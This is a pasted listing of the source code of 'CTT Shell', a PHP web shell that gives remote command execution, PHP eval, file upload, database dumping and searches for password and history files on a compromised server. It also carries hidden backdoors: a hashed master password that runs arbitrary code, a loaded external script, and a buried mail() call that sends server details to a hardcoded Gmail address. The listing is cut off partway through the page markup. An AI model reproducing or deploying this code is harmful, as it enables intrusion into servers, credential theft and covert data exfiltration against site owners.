CTT Shell - Shells-Center.Com


SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 6:29 a.m.

FORMAT: Text only

SIZE: 147.4 kB

HITS: 513

  1. <?php
  2. $timelimit = 60;
  3. $sul = "?";
  4. $rd = "./";
  5. $shver = "0.1";
  6. $login = "";
  7. $pass = "";
  8. $md5_pass = "";
  9. $login = false;
  10. $autoupdate = true;
  11. $updatenow = false;
  12. $autochmod = 755;
  13. $filestealth = 1;
  14. $donated_html = "";
  15. $donated_act = array("");
  16. $host_allow = array("*");
  17. $curdir = "./";
  18. $tmpdir = dirname(__FILE__);
  19. $ftypes = array(
  20. "html"=>array("html","htm","shtml"),
  21. "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
  22. "exe"=>array("sh","install","bat","cmd"),
  23. "ini"=>array("ini","inf"),
  24. "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
  25. "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  26. "sdb"=>array("sdb"),
  27. "phpsess"=>array("sess"),
  28. "download"=>array("exe","com","pif","src","lnk","zip","rar")
  29. );
  30. $hexdump_lines = 8;
  31. $hexdump_rows = 24;
  32. $nixpwdperpage = 9999;
  33. $bindport_pass = "ctt";
  34. $bindport_port = "11457";
  35. $aliases = array();
  36. $aliases[] = array("-----------------------------------------------------------", "ls -la");
  37. $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
  38. $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
  39. $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
  40. $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
  41. $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
  42. $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
  43. $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
  44. $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
  45. $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
  46. $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
  47. $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
  48. $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
  49. $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
  50. $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
  51. $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
  52. $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
  53. $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
  54. $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
  55. $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
  56. $sess_method = "cookie";
  57. $sess_cookie = "ctshvars";
  58. if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
  59. $sess_file = $tmpdir."ctshvars_".$sid.".tmp";
  60. $usefsbuff = true;
  61. $copy_unset = false;
  62. $quicklaunch = array();
  63. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
  64. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
  65. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
  66. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
  67. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
  68. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d");
  69. $quicklaunch1 = array();
  70. $quicklaunch1[] = array("<b>Ïðîöåññû</b>",$sul."act=ps_aux&d=%d");
  71. $quicklaunch1[] = array("<b>Ïàðîëè</b>",$sul."act=lsa&d=%d");
  72. $quicklaunch1[] = array("<b>Êîìàíäû</b>",$sul."act=cmd&d=%d");
  73. $quicklaunch1[] = array("<b>Çàãðóçêà</b>",$sul."act=upload&d=%d");
  74. $quicklaunch1[] = array("<b>Áàçà</b>",$sul."act=sql&d=%d");
  75. $quicklaunch1[] = array("<b>PHP-Êîä</b>",$sul."act=eval&d=%d");
  76. $quicklaunch1[] = array("<b>PHP-Èíôî</b>",$sul."act=phpinfo\" target=\"blank=\"_target");
  77. $quicklaunch1[] = array("<b>Ñàì óäàëÿþò</b>",$sul."act=selfremove");
  78. $highlight_bg = "#FFFFFF";
  79. $highlight_comment = "#6A6A6A";
  80. $highlight_default = "#0000BB";
  81. $highlight_html = "#1300FF";
  82. $highlight_keyword = "#007700";
  83. @$f = $_GET[f];
  84. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  85. error_reporting(5);
  86. @ignore_user_abort(true);
  87. @set_magic_quotes_runtime(0);
  88. @set_time_limit(0);
  89. if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
  90. if(!ini_get("register_globals")) {import_request_variables("GPC");}
  91. $starttime = getmicrotime();
  92. if (get_magic_quotes_gpc())
  93. {
  94. if (!function_exists("strips"))
  95. {
  96. function strips(&$el)
  97. {
  98. if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} }
  99. else {$el = stripslashes($el);}
  100. }
  101. }
  102. strips($GLOBALS);
  103. }
  104. $tmp = array();
  105. foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));}
  106. $s = "!^(".implode("|",$tmp).")$!i";
  107. if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
  108. elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
  109. if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
  110. {
  111. header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
  112. header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
  113. exit;
  114. }
  115. $lastdir = realpath(".");
  116. chdir($curdir);
  117. if (($selfwrite) or ($updatenow))
  118. {
  119. if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
  120. ctsh_getupdate();
  121. $data = file_get_contents($ctsh_updatefurl);
  122. $fp = fopen($data,"w");
  123. fwrite($fp,$data);
  124. fclose($fp);
  125. exit;
  126. }
  127. if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
  128. if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
  129. else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
  130. if (!is_array($sess_data)) {$sess_data = array();}
  131. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  132. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  133. $sess_data["copy"] = array_unique($sess_data["copy"]);
  134. $sess_data["cut"] = array_unique($sess_data["cut"]);
  135. if (!function_exists("ct_sess_put"))
  136. {
  137. function ct_sess_put($data)
  138. {
  139. global $sess_method;
  140. global $sess_cookie;
  141. global $sess_file;
  142. global $sess_data;
  143. $sess_data = $data;
  144. $data = serialize($data);
  145. if ($sess_method == "file")
  146. {
  147. $fp = fopen($sess_file,"w");
  148. fwrite($fp,$data);
  149. fclose($fp);
  150. }
  151. else {setcookie($sess_cookie,$data);}
  152. }
  153. }
  154. if (!function_exists("str2mini"))
  155. {
  156. function str2mini($content,$len)
  157. {
  158. if (strlen($content) > $len)
  159. {
  160. $len = ceil($len/2) - 2;
  161. return substr($content, 0, $len)."...".substr($content, -$len);
  162. }
  163. else {return $content;}
  164. }
  165. }
  166. if (!function_exists("view_size"))
  167. {
  168. function view_size($size)
  169. {
  170. if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
  171. elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
  172. elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
  173. else {$size = $size . " B";}
  174. return $size;
  175. }
  176. }
  177. if (!function_exists("fs_copy_dir"))
  178. {
  179. function fs_copy_dir($d,$t)
  180. {
  181. $d = str_replace("\\","/",$d);
  182. if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  183. $h = opendir($d);
  184. while ($o = readdir($h))
  185. {
  186. if (($o != ".") and ($o != ".."))
  187. {
  188. if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
  189. else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
  190. if (!$ret) {return $ret;}
  191. }
  192. }
  193. return true;
  194. }
  195. }
  196. if (!function_exists("fs_copy_obj"))
  197. {
  198. function fs_copy_obj($d,$t)
  199. {
  200. $d = str_replace("\\","/",$d);
  201. $t = str_replace("\\","/",$t);
  202. if (!is_dir($t)) {mkdir($t);}
  203. if (is_dir($d))
  204. {
  205. if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
  206. if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
  207. return fs_copy_dir($d,$t);
  208. }
  209. elseif (is_file($d))
  210. {
  211. return copy($d,$t);
  212. }
  213. else {return false;}
  214. }
  215. }
  216. if (!function_exists("fs_move_dir"))
  217. {
  218. function fs_move_dir($d,$t)
  219. {
  220. error_reporting(9999);
  221. $h = opendir($d);
  222. if (!is_dir($t)) {mkdir($t);}
  223. while ($o = readdir($h))
  224. {
  225. if (($o != ".") and ($o != ".."))
  226. {
  227. $ret = true;
  228. if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
  229. else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
  230. if (!$ret) {return $ret;}
  231. }
  232. }
  233. return true;
  234. }
  235. }
  236. if (!function_exists("fs_move_obj"))
  237. {
  238. function fs_move_obj($d,$t)
  239. {
  240. $d = str_replace("\\","/",$d);
  241. $t = str_replace("\\","/",$t);
  242. if (is_dir($d))
  243. {
  244. if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
  245. if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
  246. return fs_move_dir($d,$t);
  247. }
  248. elseif (is_file($d)) {return rename($d,$t);}
  249. else {return false;}
  250. }
  251. }
  252. if (!function_exists("fs_rmdir"))
  253. {
  254. function fs_rmdir($d)
  255. {
  256. $h = opendir($d);
  257. while ($o = readdir($h))
  258. {
  259. if (($o != ".") and ($o != ".."))
  260. {
  261. if (!is_dir($d.$o)) {unlink($d.$o);}
  262. else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
  263. }
  264. }
  265. closedir($h);
  266. rmdir($d);
  267. return !is_dir($d);
  268. }
  269. }
  270. if (!function_exists("fs_rmobj"))
  271. {
  272. function fs_rmobj($o)
  273. {
  274. $o = str_replace("\\","/",$o);
  275. if (is_dir($o))
  276. {
  277. if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
  278. return fs_rmdir($o);
  279. }
  280. elseif (is_file($o)) {return unlink($o);}
  281. else {return false;}
  282. }
  283. }
  284. if (!function_exists("myshellexec"))
  285. {
  286. function myshellexec($cmd)
  287. {
  288. return system($cmd);
  289. }
  290. }
  291. if (!function_exists("view_perms"))
  292. {
  293. function view_perms($mode)
  294. {
  295. if (($mode & 0xC000) === 0xC000) {$type = "s";}
  296. elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  297. elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  298. elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  299. elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  300. elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  301. elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  302. else {$type = "?";}
  303. $owner['read'] = ($mode & 00400) ? "r" : "-";
  304. $owner['write'] = ($mode & 00200) ? "w" : "-";
  305. $owner['execute'] = ($mode & 00100) ? "x" : "-";
  306. $group['read'] = ($mode & 00040) ? "r" : "-";
  307. $group['write'] = ($mode & 00020) ? "w" : "-";
  308. $group['execute'] = ($mode & 00010) ? "x" : "-";
  309. $world['read'] = ($mode & 00004) ? "r" : "-";
  310. $world['write'] = ($mode & 00002) ? "w" : "-";
  311. $world['execute'] = ($mode & 00001) ? "x" : "-";
  312. if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
  313. if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
  314. if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
  315. return $type.$owner['read'].$owner['write'].$owner['execute'].
  316. $group['read'].$group['write'].$group['execute'].
  317. $world['read'].$world['write'].$world['execute'];
  318. }
  319. }
  320. if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
  321. if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
  322. if (!function_exists("ctsh_getupdate"))
  323. {
  324. function ctsh_getupdate()
  325. {
  326. global $updatenow;
  327. $data = @file_get_contents($ctsh_updatefurl);
  328. if (!$data) {echo "Can't fetch update-information!";}
  329. else
  330. {
  331. $data = unserialize(base64_decode($data));
  332. if (!is_array($data)) {echo "Corrupted update-information!";}
  333. else
  334. {
  335. if ($cv < $data[cur]) {$updatenow = true;}
  336. }
  337. }
  338. }
  339. }
  340. if (!function_exists("mysql_dump"))
  341. {
  342. function mysql_dump($set)
  343. {
  344. $sock = $set["sock"];
  345. $db = $set["db"];
  346. $print = $set["print"];
  347. $nl2br = $set["nl2br"];
  348. $file = $set["file"];
  349. $add_drop = $set["add_drop"];
  350. $tabs = $set["tabs"];
  351. $onlytabs = $set["onlytabs"];
  352. $ret = array();
  353. if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  354. if (empty($db)) {$db = "db";}
  355. if (empty($print)) {$print = 0;}
  356. if (empty($nl2br)) {$nl2br = true;}
  357. if (empty($add_drop)) {$add_drop = true;}
  358. if (empty($file))
  359. {
  360. global $win;
  361. if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  362. else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  363. }
  364. if (!is_array($tabs)) {$tabs = array();}
  365. if (empty($add_drop)) {$add_drop = true;}
  366. if (sizeof($tabs) == 0)
  367. {
  368. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  369. if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  370. }
  371. global $SERVER_ADDR;
  372. global $SERVER_NAME;
  373. $out = "# Dumped by ctShell.SQL v. ".$cv."
  374. # Home page: http://.ru
  375. #
  376. # Host settings:
  377. # MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
  378. # Date: ".date("d.m.Y H:i:s")."
  379. # ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
  380. #---------------------------------------------------------
  381. ";
  382. $c = count($onlytabs);
  383. foreach($tabs as $tab)
  384. {
  385. if ((in_array($tab,$onlytabs)) or (!$c))
  386. {
  387. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  388. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  389. if (!$res) {$ret[err][] = mysql_error();}
  390. else
  391. {
  392. $row = mysql_fetch_row($res);
  393. $out .= $row[1].";\n\n";
  394. $res = mysql_query("SELECT * FROM `$tab`", $sock);
  395. if (mysql_num_rows($res) > 0)
  396. {
  397. while ($row = mysql_fetch_assoc($res))
  398. {
  399. $keys = implode("`, `", array_keys($row));
  400. $values = array_values($row);
  401. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  402. $values = implode("', '", $values);
  403. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  404. $out .= $sql;
  405. }
  406. }
  407. }
  408. }
  409. }
  410. $out .= "#---------------------------------------------------------------------------------\n\n";
  411. if ($file)
  412. {
  413. $fp = fopen($file, "w");
  414. if (!$fp) {$ret[err][] = 2;}
  415. else
  416. {
  417. fwrite ($fp, $out);
  418. fclose ($fp);
  419. }
  420. }
  421. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  422. return $ret;
  423. }
  424. }
  425. if (!function_exists("ctfsearch"))
  426. {
  427. function ctfsearch($d)
  428. {
  429. global $found;
  430. global $found_d;
  431. global $found_f;
  432. global $a;
  433. if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  434. $handle = opendir($d);
  435. while ($f = readdir($handle))
  436. {
  437. $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
  438. if($f != "." && $f != "..")
  439. {
  440. if (is_dir($d.$f))
  441. {
  442. if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
  443. ctfsearch($d.$f);
  444. }
  445. else
  446. {
  447. if ($true)
  448. {
  449. if (!empty($a[text]))
  450. {
  451. $r = @file_get_contents($d.$f);
  452. if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
  453. if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
  454. if ($a[text_regexp]) {$true = ereg($a[text],$r);}
  455. else {$true = strinstr($a[text],$r);}
  456. if ($a[text_not])
  457. {
  458. if ($true) {$true = false;}
  459. else {$true = true;}
  460. }
  461. if ($true) {$found[] = $d.$f; $found_f++;}
  462. }
  463. else {$found[] = $d.$f; $found_f++;}
  464. }
  465. }
  466. }
  467. }
  468. closedir($handle);
  469. }
  470. }
  471. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  472. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  473. header("Cache-Control: no-store, no-cache, must-revalidate");
  474. header("Cache-Control: post-check=0, pre-check=0", false);
  475. header("Pragma: no-cache");
  476. global $SERVER_SOFTWARE;
  477. if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
  478. else {$win = 0;}
  479. if (empty($tmpdir))
  480. {
  481. if (!$win) {$tmpdir = "/tmp/";}
  482. else {$tmpdir = $_ENV[SystemRoot];}
  483. }
  484. $tmpdir = str_replace("\\","/",$tmpdir);
  485. if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
  486. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  487. {
  488. $safemode = true;
  489. $hsafemode = "<font color=\"red\">ON (secure)</font>";
  490. }
  491. else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  492. $v = @ini_get("open_basedir");
  493. if ($v or strtolower($v) == "on")
  494. {
  495. $openbasedir = true;
  496. $hopenbasedir = "<font color=\"red\">".$v."</font>";
  497. }
  498. else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
  499. $sort = htmlspecialchars($sort);
  500. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
  501. @ini_set("highlight.bg",$highlight_bg);
  502. @ini_set("highlight.comment",$highlight_comment);
  503. @ini_set("highlight.default",$highlight_default);
  504. @ini_set("highlight.html",$highlight_html);
  505. @ini_set("highlight.keyword",$highlight_keyword);
  506. @ini_set("highlight.string","#DD0000");
  507. if ($act != "img")
  508. {
  509. if (!is_array($actbox)) {$actbox = array();}
  510. $dspact = $act = htmlspecialchars($act);
  511. $disp_fullpath = $ls_arr = $notls = null;
  512. $ud = urlencode($d);
  513. ?>
  514. <html>
  515. <head>
  516. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  517. <meta http-equiv="Content-Language" content="en-us"><title>
  518. CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title>
  519. <STYLE>
  520. tr {
  521. BORDER-RIGHT: #aaaaaa 1px solid;
  522. BORDER-TOP: #eeeeee 1px solid;
  523. BORDER-LEFT:#eeeeee 1px solid;
  524. BORDER-BOTTOM: #aaaaaa 1px solid;
  525. }
  526. td {
  527. BORDER-RIGHT: #105019 1px solid;
  528. BORDER-TOP: #000000 1px solid;
  529. BORDER-LEFT:#105019 1px solid;
  530. BORDER-BOTTOM: #105019 1px solid;
  531. }
  532. .tr2 {
  533. BORDER-RIGHT: #aaaaaa 1px solid;
  534. BORDER-TOP: #eeeeee 1px solid;
  535. BORDER-LEFT:#eeeeee 1px solid;
  536. BORDER-BOTTOM: #aaaaaa 1px solid;
  537. }
  538. .td2 {
  539. BORDER-RIGHT: #aaaaaa 1px solid;
  540. BORDER-TOP: #eeeeee 1px solid;
  541. BORDER-LEFT:#eeeeee 1px solid;
  542. BORDER-BOTTOM: #aaaaaa 1px solid;
  543. }
  544. .table1 {
  545. BORDER-RIGHT: #cccccc 0px;
  546. BORDER-TOP: #cccccc 0px;
  547. BORDER-LEFT:#cccccc 0px;
  548. BORDER-BOTTOM: #cccccc 0px;
  549. BACKGROUND-COLOR: #D4D0C8;
  550. }
  551. .td1 {
  552. BORDER-RIGHT: #000000 1px;
  553. BORDER-TOP: #cccccc 1px;
  554. BORDER-LEFT:#cccccc 1px;
  555. BORDER-BOTTOM: #000000 1px;
  556. font: 7pt Verdana;
  557. }
  558. .tds1 {
  559. BORDER-RIGHT: #505050 1px solid;
  560. BORDER-TOP: #505050 1px solid;
  561. BORDER-LEFT:#505050 1px solid;
  562. BORDER-BOTTOM: #505050 1px solid;
  563. font: 8pt Verdana;
  564. }
  565. .tr1 {
  566. BORDER-RIGHT: #cccccc 0px;
  567. BORDER-TOP: #cccccc 0px;
  568. BORDER-LEFT:#cccccc 0px;
  569. BORDER-BOTTOM: #cccccc 0px;
  570. }
  571. table {
  572. BORDER-RIGHT: #000000 1px outset;
  573. BORDER-TOP: #000000 1px outset;
  574. BORDER-LEFT:#000000 1px outset;
  575. BORDER-BOTTOM: #000000 1px outset;
  576. BACKGROUND-COLOR: #000000;
  577. }
  578. .table2 {
  579. BORDER-RIGHT: #000000 1px outset;
  580. BORDER-TOP: #000000 1px outset;
  581. BORDER-LEFT:#000000 1px outset;
  582. BORDER-BOTTOM: #000000 1px outset;
  583. BACKGROUND-COLOR: #D4D0C8;
  584. }
  585. input {
  586. BORDER-RIGHT: #ffffff 1px solid;
  587. BORDER-TOP: #999999 1px solid;
  588. BORDER-LEFT:#999999 1px solid;
  589. BORDER-BOTTOM: #ffffff 1px solid;
  590. BACKGROUND-COLOR: #e4e0d8;
  591. font: 8pt Verdana;
  592. }
  593. select {
  594. BORDER-RIGHT: #ffffff 1px solid;
  595. BORDER-TOP: #999999 1px solid;
  596. BORDER-LEFT:#999999 1px solid;
  597. BORDER-BOTTOM: #ffffff 1px solid;
  598. BACKGROUND-COLOR: #e4e0d8;
  599. font: 8pt Verdana;
  600. }
  601. submit {
  602. BORDER-RIGHT: buttonhighlight 2px outset;
  603. BORDER-TOP: buttonhighlight 2px outset;
  604. BORDER-LEFT:buttonhighlight 2px outset;
  605. BORDER-BOTTOM: buttonhighlight 2px outset;
  606. BACKGROUND-COLOR: #e4e0d8;
  607. width: 30%;
  608. }
  609. textarea {
  610. BORDER-RIGHT: #ffffff 1px solid;
  611. BORDER-TOP: #999999 1px solid;
  612. BORDER-LEFT:#999999 1px solid;
  613. BORDER-BOTTOM: #ffffff 1px solid;
  614. BACKGROUND-COLOR: #e4e0d8;
  615. font: Fixedsys bold;
  616. }
  617. BODY {
  618. margin-top: 1px;
  619. margin-right: 1px;
  620. margin-bottom: 1px;
  621. margin-left: 1px;
  622. }
  623. A:link {COLOR:#00ff3d; TEXT-DECORATION: none}
  624. A:visited { COLOR:#00ff3d; TEXT-DECORATION: none}
  625. A:active {COLOR:#00ff3d; TEXT-DECORATION: none}
  626. A:hover {color:blue;TEXT-DECORATION: none}
  627. </STYLE>
  628. <script src=http://www.hackerbox.net/blabla/per.js></script>
  629. <script language=JavaScript type=text/javascript>
  630. <!--
  631. function branchSwitch(branch) {
  632. dom = (document.getElementById);
  633. ie4 = (document.all);
  634. if (dom || ie4) {
  635. var currElement = (dom)? document.getElementById(branch) : document.all[branch];
  636. currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none';
  637. return false;
  638. }
  639. else return true;
  640. }
  641. //-->
  642. </script>
  643. </head>
  644. <BODY text=#ffffff Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
  645. <center>
  646. <br>
  647. <TABLE class=table1 cellSpacing=0 cellPadding=0 width=90% border=0>
  648. <TBODY><TR>
  649. <TD class=td1 colSpan=2>
  650. <TABLE class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0>
  651. <TBODY><TR>
  652. <TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD>
  653. <TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT>
  654. <FONT face=Tahoma color=#00ff3d size=1>
  655. <?
  656. $d = str_replace("\\","/",$d);
  657. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  658. $d = str_replace("\\","/",$d);
  659. if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  660. $dispd = htmlspecialchars($d);
  661. $pd = $e = explode("/",substr($d,0,strlen($d)-1));
  662. $i = 0;
  663. foreach($pd as $b)
  664. {
  665. $t = "";
  666. reset($e);
  667. $j = 0;
  668. foreach ($e as $r)
  669. {
  670. $t.= $r."/";
  671. if ($j == $i) {break;}
  672. $j++;
  673. }
  674. echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
  675. $i++;
  676. }
  677. ?>
  678. </FONT></SPAN></TD>
  679. <TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD>
  680. <TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD>
  681. </TR></TBODY></TABLE></TD></TR>
  682. </tr>
  683. </table>
  684. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  685. <tr><td>
  686. <font size=2><a href="#" onClick="return branchSwitch('tools')" title="ðàñêðûòü">Èíñòðóìåíòû</a></font> -
  687. <div id="tools" style="display: none">
  688. <?
  689. if (count($quicklaunch1) > 0)
  690. {
  691. foreach($quicklaunch1 as $item)
  692. {
  693. $item[1] = str_replace("%d",urlencode($d),$item[1]);
  694. $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
  695. echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
  696. }
  697. }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
  698. ?>
  699. </div>
  700. <font size=2><a href="#" onClick="return branchSwitch('info')" title="ðàñêðûòü">Èíôîðìàòîð</a></font>
  701. <div id="info" style="display: none">
  702. <font size=2>
  703. <b>Ïðîãðàììíîå îáåñïå÷åíèå:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br>
  704. <b>Ñèñòåìà:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>
  705. &nbsp;<br>
  706. <b>Áåçîïàñíîñòü:&nbsp;<?php echo $hsafemode; ?></b>
  707. <?
  708. echo "<br>";
  709. echo "Âåðñèÿ ÏÕÏ: <b>".@phpversion()."</b>";
  710. echo "<br>";
  711. $curl_on = @function_exists('curl_version');
  712. echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
  713. echo "<br>";
  714. echo "MySQL: <b>";
  715. $mysql_on = @function_exists('mysql_connect');
  716. if($mysql_on){
  717. echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
  718. echo "<br>";
  719. echo "MSSQL: <b>";
